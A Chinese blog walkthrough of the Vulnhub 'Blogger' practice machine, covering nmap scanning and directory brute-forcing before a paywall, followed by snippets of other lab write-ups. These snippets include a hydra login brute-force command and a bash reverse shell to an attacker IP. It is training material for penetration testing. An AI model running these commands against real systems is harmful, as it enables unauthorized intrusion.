靶机实战-blogger

最新推荐文章于 2025-07-22 16:08:53 发布
原创 最新推荐文章于 2025-07-22 16:08:53 发布 · 4.1k 阅读 · 3 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全 #linux #web安全

靶机实战 - blogger

1 介绍

难度: 初学者

描述:一位Web 开发人员 James M Brunner 最近创建了一个博客网站。他雇佣你来测试他博客网站的安全性。

目标: 拿到flag

2 环境搭建

由于靶机特点,需要搭建在VirtualBox ,所以在启动前配置网卡为桥接模式

  1. 双击 ova 文件导入 virtualBox,然后设置网卡模式

在这里插入图片描述

  1. 配置kali的网卡为 桥接模式

    [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-dAIfyCOY-1649137170556)(靶机实战-blogger.assets/image-20220403222328401.png)]

靶机渗透

攻击机 kali Linux :192.168.31.106

  1. 主机发现

    nmap -sP 192.168.31.0/24 // 采用ping扫描存活主机

    [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-tsSnGZUi-1649137170557)(靶机实战-blogger.assets/image-20220403223314018.png)]

    排除个人IP和已知网络IP后,存在一个异常IP地址: 192.168.31.73

  2. 进一步扫描 IP 地址开放的端口号

    nmap -sV -sT -p- 192.168.31.73 // -sV 探测端口服务版本 -sT 全连接 -p- 全端口

    扫描结束后,发现目标IP 开放了 2 个端口,SSH 可以采用爆破密码, HTTP服务可以通过常规 web 漏洞手段渗透,确认攻击方法后,优先挖掘 web 漏洞

    [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-cPNAdaUf-1649137170558)(靶机实战-blogger.assets/image-20220403223801862.png)]

后续可能会遇到跳转到域名访问情况, 将 blogger.thm 添加到 /etc/hosts 文件 或 C:\Windows\System32\drivers\etc\hosts文件
在这里插入图片描述

  1. web 应用程序- 漏洞发现

    先进行目录爆破,使用工具 dirsearch 爆破路径

    命令: python dirsearch.py -u http://192.168.31.73/

最低0.47元/天 解锁文章
靶机渗透】BLOGGER: 1
weixin_47443077的博客
06-16 1194
靶机渗透】BLOGGER: 1 0x01靶机介绍 1.详情 链接: https://www.vulnhub.com/entry/blogger-1,675/ 2.描述 James M Brunner, A Web Developer has recently created a blog website. He hired you to test the Security of his Blog Website. Hack Your Way In Mr. Robot Style ???? 一位Web 开发
靶机实战-zico
滕财然的博客
01-19 1332
zico靶机实战 1、主机发现 netdiscover: -i 指定网卡 -r 指定网段 2、端口扫描 目标开放了44929,22,111,80端口 3、扫描端口详细信息 22-ssh,80-http,111-rpcbind,44929-status 老规矩,干80端口 4、渗透80端口(http服务) 点击页面上可点击的按钮,找到一个有用的: 链接后面有?page= tools.htm...
靶机渗透 blog
Anonymous
03-08 362
端口 访问 80 端口 目录扫描 在 /my_weblog 目录下 访问 README 发现是使用 nibbleblog 搭建的,4.0.3版本存在任意文件上传漏洞 需要使用到后台的账号密码 账号爆破 hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.0.134 http-post-form "/my_weblog/admin.php:username=admin&password=^PASS^:Incor..
靶机实战(billu)
weixin_45605313的博客
06-01 734
billu实验环境实验过程信息收集主机发现端口扫描目录扫描漏洞发现漏洞利用提权总结 实验环境 靶机:billu 测试机:kali,win10 实验过程 信息收集 主机发现 靶机ip:192.168.238.157 端口扫描 端口:80 常见web漏洞 22 弱口令爆破 目录扫描 主页面:提示是有sql注入的 mysql后台登陆页面 漏洞发现 test 页面发现任意文件下载 找到phpmyadmin的配置文件var/www/phpmy/config.inc.php尝试(ssh,数据库
靶机实战-FristiLeaks
滕财然的博客
01-20 538
FristiLeaks靶机实战 文章目录FristiLeaks靶机实战1、主机发现2、端口扫描3、扫描端口详细信息4、访问http服务(80端口)5、获取反弹shell6、提权 1、主机发现 netdiscover -i eth0 -r 192.168.232.0/24 双网卡,147或148都可以用 2、端口扫描 masscan --rate=100000 -p 0-65535 192.168...
精选资源
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
应急响应靶机练习-Linux1
m0_74631795的博客
03-14 1275
在配置文件中发现redis监听0.0.0.0,并且没有密码要求(requirepass被注释了),这就是redis未授权访问漏洞的根源。是一个传统的 Linux 启动脚本文件,用于在系统启动时执行一些自定义的命令或脚本。之所以查看redis日志,是因为在lastlog中发现存在redis用户,再结合ssh公钥登录,很有可能是redis未授权漏洞。发现含有redis字符的ssh公钥,可以判定攻击者利用redis未授权漏洞进行ssh公钥写入,再进行ssh远程连接。分左右,在短时间内,可疑IP。
靶机实战-DC-6
滕财然的博客
03-03 991
DC-6靶机实战 文章目录DC-6靶机实战1、主机发现2、端口及端口详细信息扫描3、老规矩,访问web服务(80端口)4、提权 1、主机发现 2、端口及端口详细信息扫描 开放22、80端口 3、老规矩,访问web服务(80端口) 输入IP之后会变成http://wordy且找不到此网站 和以前一样,添加到hosts文件中//物理机和kali都添加 重新访问://这里我用的是火狐的一款插件...
Vulnhub靶机实战-PRESIDENTIAL
黑白的博客
01-10 1415
声明 好好学习,天天向上 搭建 vulnhub官网下载完镜像后,用vmware打开,遇到错误点击重试,即可,选择NAT后,直接就DHCP了 注意一点,vmware的兼容性,有问题,我用vmware,反弹shell和提权的时候,惨遭失败,一定要用oracle virtualbox,一定一定一定 vmware我用的桥接,virtualbox用的仅主机网卡#2,调了一下本机的网卡,调了半天,两边才能互相ping通 信我一句话,这非技术问题困了我好几天,弄不出来,vulnhub首页说建议用virtualbox,又说
靶机实战:Funbox10
CHAsichuan的博客
06-14 2438
一次中等难度的靶机超详细版记录
CTF6靶机实战.zip
05-25
CTF6靶机实战包括三部分: 1)靶机实战过程 2)文件上传的反弹shell文件(shell.php) 3)系统版本漏洞需要的文件(8478.sh)
靶机实战-Acid
滕财然的博客
01-26 978
Acid靶机实战 文章目录Acid靶机实战1、主机发现2、端口扫描3、端口详细信息扫描4、访问8080端口5、访问33447端口6、提权 1、主机发现 目标主机:192.168.232.160 我是用arp命令扫的,大家可自行选择 2、端口扫描 3、端口详细信息扫描 4、访问8080端口 只有一个文件,点击就会下载,先pass 5、访问33447端口 查看网页源代码: 发现一串16进制...
靶机实战-evilscience
滕财然的博客
01-28 833
evilscience靶机实战 文章目录evilscience靶机实战1、主机发现2、端口扫描3、端口详情扫描4、访问80端口5、提权方法一方法二 1、主机发现 目标IP:192.168.232.164 2、端口扫描 3、端口详情扫描 22端口–ssh、80端口–http 4、访问80端口 浏览网站,寻找有价值的信息 发现该网站有可能存在LFI(本地文件包含) 在about.php页面看...
Vulnhub Noob: 1靶机攻击实战(一)
最新发布
初学者
07-22 978
本文介绍了如何通过靶机Noob.ova进行渗透测试的过程。首先通过arp-scan和nmap扫描获取靶机IP和开放端口(21/FTP、80/HTTP、55077/SSH)。发现FTP存在匿名访问漏洞,获取到Base64编码的账号密码"champ:password",成功登录80端口的网页。通过分析下载的压缩包,利用steghide工具从funny.bmp文件中提取出SSH凭据"wtf:this one is a simple one"。最后使用该凭据登录55077端口
靶机渗透测试实战(一)——熟悉渗透测试流程的简单测试
热门推荐
橘子女侠
05-09 1万+
本篇文章不注重于渗透测试,而在于将之前学习过的方法加以熟悉; 1. 实验环境 靶机:CentOS 6.7,IP地址为:192.168.37.137 攻击机:Kali,IP地址为:192.168.37.131 运行环境:VMware 2. 实验步骤 信息收集 (1)查询攻击机Kali的IP地址; (2)识别存活的主机,发现攻击的目标 (注:二、三、四层发现的目的都是识别...
vulnhub-CTF4靶机实战
御七彩虹猫
04-26 3543
Vulnhub-CTF4靶机实战
VulnHub-DarkHole_2靶机实战(超详细保姆级教程)
精品博客,你值得一看~
08-13 8429
记得我们查看过9999端口运行的程序,当我们看到源代码的内容时,我们看到这允许远程命令执行。bash -c ‘bash -i >& /dev/tcp/192.168.184.156/9001 0>&1’ #记得修改你的IP。id=1' and 1=2 --+ #页面信息消失,说明id的闭合为单引号。到此,我们就可以进行ssh连接了.下面是拓展工具注入的方式.着急看结果的宝宝们可以直接移步下面的ssh连接步骤.
Vulnhub napping-1.0.1靶机攻击实战(一)
初学者
02-08 965
到这里,就算获得了root的权限了,那么这里有人会问,为什么我们拿到了daniel用户的权限,不直接通过这个用户提权反而是要通过adrian用户建立反射shell进行提权呢?这个问题有兴趣的读者可以深入研究一下。
Vulnhub: blogger:1靶机
qq_43884092的博客
08-03 832
wordpress插件任意文件上传漏洞,sudo提权
vulnhub靶机AI-WEB1
01-19
### 关于VulnHub靶机AI-WEB1的信息 针对VulnHub平台上的AI-WEB1靶机,该虚拟机旨在提供给有兴趣了解Web应用程序安全性的个人一种实践环境。通过这一挑战,参与者可以探索常见的Web应用漏洞以及如何利用这些弱点来获得系统的进一步访问权限。 #### 初始侦察阶段 在开始任何实际攻击之前,进行全面的情报搜集至关重要。这通常涉及到使用诸如`Nmap`这样的工具来进行端口扫描和服务版本检测: ```bash nmap -A <target_IP> ``` 上述命令能够揭示开放的服务及其潜在的安全配置缺陷[^3]。 #### Web服务器枚举 一旦确认目标运行着HTTP(S)服务,则应立即启动目录遍历尝试。可借助像`Dirb`或更现代的选择如`Gobuster`等工具完成这项工作: ```bash gobuster dir -u http://<target_ip> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt ``` 此过程有助于发现隐藏页面和管理接口,它们可能是后续入侵的关键入口点。 #### 应用层挖掘 对于基于PHP构建的应用程序来说,源码泄露是一个常见问题。如果运气好,在上一步找到的路径里可能会存在`.php~`或其他临时文件形式暴露出来的代码片段。仔细审查这部分内容往往能带来意想不到的收获——比如硬编码凭证或是调试模式下的敏感信息泄漏。 #### 数据库交互测试 许多老旧CMS(内容管理系统)容易受到SQL注入的影响。当遇到带有查询参数的URL时,不妨试试经典的单引号闭合技巧;而对于表单提交,则可通过修改POST数据包中的字段名与值组合来进行试探性输入验证绕过[^8]。 #### 提升权限方法 成功突破前端防护之后,下一步便是考虑怎样扩大战果直至取得root shell。Linux系统下,检查SUID位设置不当的二进制文件是一项基本技能;而Windows环境中则需留意计划任务、注册表键值异常变动等情况。 #### Drupal特定注意事项 鉴于部分描述提及到Drupal CMS, 若确实如此的话,值得注意的是有关于此框架内核升级机制的一个已知特性:即管理员账户密码可以通过编辑数据库记录的方式实现重置而不依赖原有认证流程[^9]。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值